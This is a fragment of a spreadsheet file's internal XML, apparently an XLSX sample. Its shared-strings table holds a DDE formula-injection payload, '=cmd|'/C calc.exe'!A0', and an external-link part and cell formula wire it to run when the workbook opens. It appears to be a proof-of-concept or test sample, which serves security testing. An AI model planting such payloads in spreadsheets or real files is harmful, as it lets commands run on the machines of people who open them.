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bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="20490" windowHeight="610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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
  <si>
    <t>=cmd|'/C calc.exe'!A0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</si>
</sst>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calc.exe">
    <ddeItems>
      <ddeItem name="A0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/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="26.28515625" customWidth="1"/>
    <col min="3" max="3" width="20.42578125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A1" t="e">
        <f>[1]!A0</f>
        <v>#REF!</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="2" spans="1:3" x14ac:dyDescent="0.25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Kotian</dc:creator>
  <cp:lastModifiedBy>Sagar Kotian</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-10T06:24:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-20T14:54:52Z</dcterms:modified>
</cp:coreProperties>
</file>